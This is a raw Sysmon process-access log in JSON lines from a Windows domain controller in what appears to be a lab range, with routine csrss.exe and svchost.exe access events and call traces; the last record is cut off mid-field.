{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5615,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.065\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D8-5F25-0000-0010EC050900}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.065","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D8-5F25-0000-0010EC050900}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5616,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.065\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.065","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5617,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.065\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.065","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5618,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.065\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.065","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5619,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.065\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.065","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5620,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.065\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.065","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5621,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.065\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.065","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5622,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.065\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.065","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5623,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.065\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 